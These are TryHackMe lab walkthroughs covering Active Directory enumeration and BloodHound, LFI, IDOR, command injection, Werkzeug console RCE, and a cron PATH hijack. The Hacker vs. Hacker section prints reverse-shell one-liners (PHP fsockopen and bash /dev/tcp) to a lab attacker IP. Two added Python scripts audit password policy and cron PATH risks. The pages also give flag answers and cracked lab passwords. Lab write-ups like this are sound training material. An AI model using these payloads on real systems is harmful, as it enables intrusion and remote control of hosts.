TryHackMe – Enumerating Active Directory Walkthrough

TryHackMe | Enumerating Active Directory
This room covers various Active Directory enumeration techniques, their use cases as well as drawbacks.
tryhackme.com

This is a walkthrough for the TryHackMe room “Enumerating Active Directory”.

Task 2

Q1: What native Windows binary allows us to inject credentials legitimately into memory?

A: runas.exe

Q2: What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

A: /netonly

Q3: What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

A: SYSVOL

Q4: When performing dir \\za.tryhackme.com\SYSVOL, what type of authentication is performed by default?

A: Kerberos Authentication

Task 3

Q1: How many Computer objects are part of the Servers OU?

Hint: Use MMC and navigate to the Servers OU.

Follow the steps mentioned in TryHackMe to set up MMC.

Verify the Servers OU.

A: 2

Q2: How many Computer objects are part of the Workstations OU?

Verify the Workstations OU.

A: 1

Q3: How many departments (Organisational Units) does this organisation consist of?

Hint: Look under the People OU for department OUs.

Check the child OUs under People.

A: 7

Q4: How many Admin tiers does this organisation have?

Hint: Look under the Admin OU for tier OUs.

Verify the Admins OU.

A: 3

Q5: What is the value of the flag stored in the description attribute of the t0_tinus.green account?

Search for the t0_tinus.green account from Find Users, Contacts, and Groups and check its Description attribute for the flag.

A: THM{Enumerating.Via.MMC}

Task 4

Q1: Apart from the Domain Users group, what other group is the aaron.harris account a member of?

View the aaron.harris account details and review the Global Group memberships.

za\david.cook@THMJMP1 C:\Users\david.cook>net user aaron.harris /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    aaron.harris
Full Name                    Aaron Harris
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/24/2022 10:05:11 PM
Password expires             Never
Password changeable          2/24/2022 10:05:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Internet Access
The command completed successfully.

A: Internet Access

Q2: Is the Guest account active? (Yay,Nay)

View the Guest account details and check the Account active field.

za\david.cook@THMJMP1 C:\Users\david.cook>net user Guest /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               No
Account expires              Never

Password last set            1/31/2025 2:47:20 PM
Password expires             Never
Password changeable          1/31/2025 2:47:20 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Guests
Global Group memberships     *Domain Guests
The command completed successfully.

A: Nay

Q3: How many accounts are a member of the Tier 1 Admins group?

Review the details of the Tier 1 Admins group.

za\david.cook@THMJMP1 C:\Users\david.cook>net group "Tier 1 Admins" /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Group name     Tier 1 Admins
Comment

Members

-------------------------------------------------------------------------------
t1_arthur.tyler          t1_gary.moss             t1_henry.miller
t1_jill.wallis           t1_joel.stephenson       t1_marian.yates
t1_rosie.bryant
The command completed successfully.

A: 7

Q4: What is the account lockout duration of the current password policy in minutes?

View the password policy and check the Lockout duration field.

za\david.cook@THMJMP1 C:\Users\david.cook>net accounts /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.

A: 30
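The `net accounts /domain` output above also tells a defender how weak the policy is (no lockout threshold, empty passwords allowed, passwords never expire). The following is an added example, not from the room or the walkthrough author: it parses that exact output and flags every setting below an assumed audit baseline (the baseline constants are assumptions, not TryHackMe values).

```python
# Audit of the `net accounts /domain` output shown above (added example, not
# part of the TryHackMe room). The sample text is the walkthrough's own output.
NET_ACCOUNTS_OUTPUT = """\
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.
"""

# Assumed audit baselines (not from the room): the weakest values an auditor
# would accept for each setting.
MIN_PASSWORD_LENGTH = 14
MAX_PASSWORD_AGE_DAYS = 365
MIN_PASSWORD_HISTORY = 24


def parse_net_accounts(text):
    """Turn the 'Label:   value' lines of `net accounts` into a dict."""
    policy = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep and label.strip() and value.strip():
            policy[label.strip()] = value.strip()
    return policy


def _as_int(value):
    """Numeric settings arrive as strings; 'Never', 'None', 'Unlimited' become None."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def assess_password_policy(policy):
    """Return (setting, value, why it matters) for every setting below baseline."""
    findings = []
    checks = [
        ("Minimum password length", lambda v: v is not None and v >= MIN_PASSWORD_LENGTH,
         "short or empty passwords are accepted"),
        ("Maximum password age (days)", lambda v: v is not None and v <= MAX_PASSWORD_AGE_DAYS,
         "passwords never or rarely expire, so a leaked one stays valid"),
        ("Length of password history maintained", lambda v: v is not None and v >= MIN_PASSWORD_HISTORY,
         "old passwords can be reused immediately"),
        ("Lockout threshold", lambda v: v is not None and v > 0,
         "accounts never lock out, so online password guessing is unlimited"),
    ]
    for setting, ok, reason in checks:
        raw = policy.get(setting)
        if not ok(_as_int(raw)):
            findings.append((setting, raw, reason))
    return findings


if __name__ == "__main__":
    for setting, raw, reason in assess_password_policy(parse_net_accounts(NET_ACCOUNTS_OUTPUT)):
        print(f"WEAK  {setting} = {raw}: {reason}")
```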

Task 5

Q1: What is the value of the Title attribute of Beth Nolan (beth.nolan)?

Hint: Use Get-ADUser, remember to set -Properties * to receive all properties.

Check the Title property of the beth.nolan account.

PS C:\Users\david.cook> Get-ADUser -Identity beth.nolan -Server za.tryhackme.com -Properties Title


DistinguishedName : CN=beth.nolan,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Beth
Name              : beth.nolan
ObjectClass       : user
ObjectGUID        : c4ae7c4c-4f98-4366-b3a1-c57debe3256f
SamAccountName    : beth.nolan
SID               : S-1-5-21-3330634377-1326264276-632209373-2760
Surname           : Nolan
Title             : Senior
UserPrincipalName :

A: Senior

Q2: What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

Hint: Use Get-ADUser, remember to set -Properties * to receive all properties.

Check the DistinguishedName property of the annette.manning account.

PS C:\Users\david.cook> Get-ADUser -Identity annette.manning -Server za.tryhackme.com -Properties DistinguishedName


DistinguishedName : CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Annette
Name              : annette.manning
ObjectClass       : user
ObjectGUID        : 57069bf6-db28-4988-ac9e-0254ca51bb2f
SamAccountName    : annette.manning
SID               : S-1-5-21-3330634377-1326264276-632209373-1257
Surname           : Manning
UserPrincipalName :

A: CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

Q3: When was the Tier 2 Admins group created?

Hint: Use Get-ADGroup, remember to set -Properties * to receive all properties. Answer should be in DD/MM/YYYY HH:MM:SS AM/PM format. If you remote from your own local machine and it is in a timezone other than UTC+0 you will have to take timezones into account.

Check the Created property of the Tier 2 Admins group.

PS C:\Users\david.cook> Get-ADGroup -Identity "Tier 2 Admins" -Server za.tryhackme.com -Properties created



Created           : 2/24/2022 10:04:41 PM
DistinguishedName : CN=Tier 2 Admins,OU=Groups,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Global
Name              : Tier 2 Admins
ObjectClass       : group
ObjectGUID        : 6edab731-c305-4959-bd34-4ca1eefe2b3f
SamAccountName    : Tier 2 Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-1104

A: 2/24/2022 10:04:41 PM

Q4: What is the value of the SID attribute of the Enterprise Admins group?

Hint: Use Get-ADGroups, remember to set -Properties * to receive all properties.

Check the SID property of the Enterprise Admins group.

PS C:\Users\david.cook> Get-ADGroup -Identity "Enterprise Admins" -Server za.tryhackme.com -Properties SID


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 93846b04-25b9-4915-baca-e98cce4541c6
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-519

A: S-1-5-21-3330634377-1326264276-632209373-519

Q5: Which container is used to store deleted AD objects?

Hint: Use Get-ADDomain and review the information.

Verify the DeletedObjectsContainer property of the za.tryhackme.com domain.

PS C:\Users\david.cook> Get-ADDomain -Server za.tryhackme.com


ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=za,DC=tryhackme,DC=com
DeletedObjectsContainer            : CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

A: CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task 6

Q1: What command can be used to execute Sharphound.exe and request that it recovers Session information only from the za.tryhackme.com domain without touching domain controllers?

A: Sharphound.exe --CollectionMethods Session --Domain za.tryhackme.com --ExcludeDCs

Q2: Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

Hint: Use the Pre-Built Analytics Queries.

Copy Sharphound.exe to a writable folder and run it.

PS C:\Users\andrea.mitchell> copy C:\Tools\Sharphound.exe ~\Documents\
PS C:\Users\andrea.mitchell> cd ~\Documents\
PS C:\Users\andrea.mitchell\Documents> .\Sharphound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

At the end of the process, a ZIP file will be created.

PS C:\Users\andrea.mitchell\Documents> dir


    Directory: C:\Users\andrea.mitchell\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/31/2025   3:44 PM         121297 20250131154447_BloodHound.zip
-a----        3/16/2022   5:19 PM         906752 Sharphound.exe
-a----        1/31/2025   3:44 PM         359470 YzE4MDdkYjAtYjc2MC00OTYyLTk1YTEtYjI0NjhiZmRiOWY1.bin

Download the ZIP file with the SCP command.

$ scp andrea.mitchell@THMJMP1.za.tryhackme.com:C:/Users/andrea.mitchell/Documents/20250131154447_BloodHound.zip .
andrea.mitchell@thmjmp1.za.tryhackme.com's password: 
20250131154447_BloodHound.zip                                           100%  118KB  59.2KB/s   00:02

Start neo4j and bloodhound, then log in.

$ sudo neo4j console
$ bloodhound

Upload the ZIP file by dragging and dropping it into the bloodhound GUI.

Run List all Kerberoastable Accounts from the Analysis tab and verify the accounts.

A: 4

Q3: How many machines do members of the Tier 1 Admins group have administrative access to?

Hint: Search for the Tier 1 Admins group and enumerate its information.

Check Local Admin Rights under Node Info for the Tier 1 Admins group.

A: 2

Q4: How many users are members of the Tier 2 Admins group?

Hint: Search for the Tier 2 Admins group and enumerate its information.

Check Group Members under Node Info for the Tier 2 Admins group.

A: 15

TryHackMe – Lo-Fi Walkthrough

TryHackMe | Lo-Fi
Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!
tryhackme.com

This is the walkthrough for the TryHackMe room “Lo-Fi”.

Task 1

Q1: Climb the filesystem to find the flag!

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.174.194 -oN nmap_result
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a5:97:85:99:30:80:e2:7b:02:b1:ac:c9:65:e1:9d:05 (RSA)
|   256 e8:dc:f6:8d:84:fa:ab:0d:80:77:23:47:78:f4:31:ad (ECDSA)
|_  256 24:82:a1:9c:a6:3b:38:58:52:c2:21:13:25:86:55:f8 (ED25519)
80/tcp    open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)

You now know the operational status of the ports.

Port  Service  Version
22    ssh      OpenSSH 8.2p1
80    http     Apache/2.2.22

Access port 80.

When you click on the Discography link, the file specified by ?page= is loaded.

It looks like LFI can be done.
I was able to load /etc/passwd with ?page=../../../../../../etc/passwd.

I was able to get the flag at ?page=../../../../../../flag.txt.

A: flag{e4478e0eab69bd642b8238765dcb7d18}

TryHackMe – OWASP TOP 10 – 2021 Walkthrough

This is a walkthrough of the TryHackMe room “OWASP Top 10 – 2021”.

TryHackMe | OWASP Top 10 – 2021
Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
tryhackme.com

Task 4

Q2: Deploy the machine and go to http://MACHINE_IP – Login with the username noot and the password test1234.

Launch the target machine, visit the website, and you will see a login form.

Log in with Username: noot, Password: test1234.

Q3: Look at other users’ notes. What is the flag?

Hint: The URL contains ?note_id=1 – I wonder what happens if you change the parameter value? You might be able to access another user’s notes.

The note with the number given in the note_id parameter is displayed, as with note_id=1.

You can get another user’s note by specifying note_id=0, which gives you the flag.

A: flag{fivefourthree}

Task 8

Q1: What is the name of the mentioned directory?

Hint: Have a look at the source code on the /login page.

Access port 81.

I found the path /assets in the source code of /login.php.

A: /assets

Q2: Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

In /assets I found webapp.db.

A: webapp.db

Q3: Use the supporting material to access the sensitive data. What is the password hash of the admin user?

When I downloaded webapp.db and checked the data, I found the account name and password hash value.

A: 6eea9b7ef19179a06954edd0f6c05ceb

Q4: What is the admin’s plaintext password?

Hint: Read the supporting material.

A hash-lookup site (see the supporting material) is used to analyze the hash value.

The admin password hash was found, and the plaintext password was recovered.

A: qwertyuiop

Q5: Log in as the admin. What is the flag?

I was able to get the flag when I logged in to /login.php with Username: admin, Password: qwertyuiop.

A: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 10

Q1: What strange text file is in the website’s root directory?

Access port 82.

Command injection with $() was successful.

I was able to check the file structure with $(ls).

A: drpepper.txt

Q2: How many non-root/non-service/non-daemon users are there?

Confirm from /etc/passwd.

A: 0

Q3: What user is this app running as?

Confirm with the whoami command.

A: apache

Q4: What is the user’s shell set as?

Confirm from /etc/passwd.

A: /sbin/nologin

Q5: What version of Alpine Linux is running?

Hint: The version can be found in “/etc/alpine-release”.

Confirm from /etc/alpine-release.

A: 3.16.0

Task 11

Q2: What is the value of the flag in joseph’s account?

Hint: Is there any security question that can be easily guessed?

Access port 85.

I don’t know the password for joseph, so I will try to change the password from /resetpass1.php.

There are three secret questions, but the favorite color one seems easy to guess.

When you finally enter green, you will be issued a new password, so make a note of it.

You have successfully logged in with your new password.

I was able to get the flag from a text file.

A: THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task 12

Q1: Navigate to http://TARGET_IP:86/console to access the Werkzeug console.

When I accessed /console, I was able to see the Werkzeug console.

Q2: What is the database file name (the one with the .db extension) in the current directory?

RCE from the console was successful with the help of the os module.

import os; print(os.popen("ls -l").read())

A: todo.db

Q3: Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?

Hint: The flag looks like THM{…}. Be sure to write it without the surrounding quotes!

Review the code of app.py.

import os; print(os.popen("cat app.py").read())

A: THM{Just_a_tiny_misconfiguration}

TryHackMe – Hacker vs. Hacker Walkthrough

TryHackMe | Hacker vs. Hacker
Someone has compromised this server already! Can you get in and evade their countermeasures?
tryhackme.com

Task 1

Q1: What is the user.txt flag?

Hint: The hacker may have been a bit sloppy in their stealth measures…

Perform a port scan.

$ nmap -Pn -sC -sV -A -T4 10.10.93.193 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You now know the operational status of the ports.

Port  Service  Version
22    ssh      OpenSSH 8.2p1
80    http     Apache httpd 2.4.41

I was able to access the website on port 80.

[Screenshot: home page]

Perform directory enumeration.

$ dirsearch -u http://10.10.93.193
[04:53:16] 301 -  310B  - /css  ->  http://10.10.93.193/css/
[04:53:17] 301 -  310B  - /cvs  ->  http://10.10.93.193/cvs/
[04:53:17] 200 -   26B  - /cvs/
[04:53:19] 301 -  311B  - /dist  ->  http://10.10.93.193/dist/
[04:53:19] 200 -  455B  - /dist/
[04:53:30] 301 -  313B  - /images  ->  http://10.10.93.193/images/
[04:53:30] 200 -  498B  - /images/
[04:54:14] 200 -  335B  - /upload.php

The file upload at /upload.php has been rewritten.

[Screenshot: upload source code]

The original process seems to check whether the file is a .pdf and then upload it to /cvs.
In this case, the attacker would bypass the extension check by uploading a file with a double extension such as .pdf.php.
Since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell file.

Predict what the attacker would have uploaded and scan /cvs for .pdf.php files.

$ dirsearch -u http://10.10.222.254/cvs -e .pdf.php
[11:31:30] 200 -   18B  - /cvs/shell.pdf.php

/cvs/shell.pdf.php was hit.
Shell files can often execute commands with GET request parameters.
Fuzz the parameter name.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.222.254/cvs/shell.pdf.php?FUZZ=ls -ic -c -fs 18
cmd                     [Status: 200, Size: 43, Words: 1, Lines: 4, Duration: 241ms]

The cmd parameter was discovered.

[Screenshot: rce success]

Send parameters.

?cmd=php%20-r%20%27$sock=fsockopen(%2210.6.55.144%22,1234);exec(%22bash%20%3C%263%20%3E%263%202%3E%263%22);%27

Catch the reverse shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php

You can get the flag from /home/lachlan/user.txt:

/home/lachlan/user.txt

thm{af7e46b68081d4025c5ce10851430617}

A: thm{af7e46b68081d4025c5ce10851430617}

Q2: What is the proof.txt flag?

Hint: … and a bit sloppy in their automated kill scripts.

When you check /home/lachlan/.bash_history, you will find that lachlan’s password is thisistheway123.

./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history

However, when I made an SSH connection, I was able to log in, but the connection was disconnected after a few seconds.

$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password: 
Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.

If you check the /etc/cron.d/persistence script that you found in /home/lachlan/.bash_history, you can see that the session is being killed by that script.

PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done

If you look at the commands, you can see that pkill is not specified with an absolute path, so it is resolved in order from PATH=/home/lachlan/bin:/bin:/usr/bin.
If you create a pkill file in /home/lachlan/bin, /home/lachlan/bin/pkill will be executed as root by the cron job.
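The same PATH-resolution mistake can be found by auditing cron files before anyone abuses it. The following is an added example, not the room's or the author's code: it parses the /etc/cron.d/persistence file shown above, resolves each bare command name through the file's PATH, and reports any that a non-root-writable directory would shadow; the writable directory and real binary locations are a constructed model of the host rather than live filesystem checks.

```python
import re

# /etc/cron.d/persistence as shown above, embedded so the audit runs offline
# (added example, not part of the room).
CRON_D_PERSISTENCE = """\
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
"""

# Constructed model of the host instead of probing it live: directories a
# non-root user can write to, and the directory holding each real binary.
NON_ROOT_WRITABLE = {"/home/lachlan/bin"}
REAL_BINARY_DIR = {"pkill": "/usr/bin", "sleep": "/bin", "ls": "/bin", "echo": "/bin"}
SHELL_KEYWORDS = {"do", "done", "if", "then", "else", "fi", "while", "until"}


def command_names(command):
    """Yield the first word of each simple command; loop headers and keywords are skipped."""
    for part in re.split(r"&&|\|\||;|\||`", command):  # control operators and backticks
        words = part.split()
        while words and (words[0] in SHELL_KEYWORDS or words[0] == "for"):
            words = [] if words[0] == "for" else words[1:]  # "for VAR in ..." is not a command
        if words:
            yield words[0]


def parse_cron_d(text):
    """Return (PATH directories, [(user, command), ...]) for an /etc/cron.d file."""
    path, jobs = ["/usr/bin", "/bin"], []  # assumed default PATH when the file sets none
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path = line[len("PATH="):].split(":")
            continue
        fields = line.split(None, 6)  # min hour dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return path, jobs


def find_path_hijacks(text, writable_dirs, real_binary_dir):
    """Report (user, command, directory) for each bare command name that a writable
    PATH directory can shadow before the directory holding the real binary is reached."""
    path, jobs = parse_cron_d(text)
    findings = []
    for user, command in jobs:
        for name in command_names(command):
            if "/" in name:  # explicit path: PATH is not consulted
                continue
            for directory in path:  # searched left to right, first hit wins
                if directory in writable_dirs:
                    findings.append((user, name, directory))
                    break
                if real_binary_dir.get(name) == directory:
                    break  # the real binary comes first, nothing to shadow
    return findings
```

Running `find_path_hijacks(CRON_D_PERSISTENCE, NON_ROOT_WRITABLE, REAL_BINARY_DIR)` reports all six root jobs for the bare `pkill`, while the absolute `/bin/sleep`, `/bin/ls` and `/usr/bin/echo` invocations are not flagged.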

Create /home/lachlan/bin/pkill as a reverse shell script.

echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill

Start a Netcat listener in advance.

$ nc -lvnp 1234

SSH in and enter the command before the process is killed.

$ ssh lachlan@10.10.222.254
$ echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill
$ nope

After a while, I was able to get the root shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42862
sh: 0: can't access tty; job control turned off
# whoami
root

You can get the flag from /root/root.txt:

/root/root.txt

thm{7b708e5224f666d3562647816ee2a1d4}

A: thm{7b708e5224f666d3562647816ee2a1d4}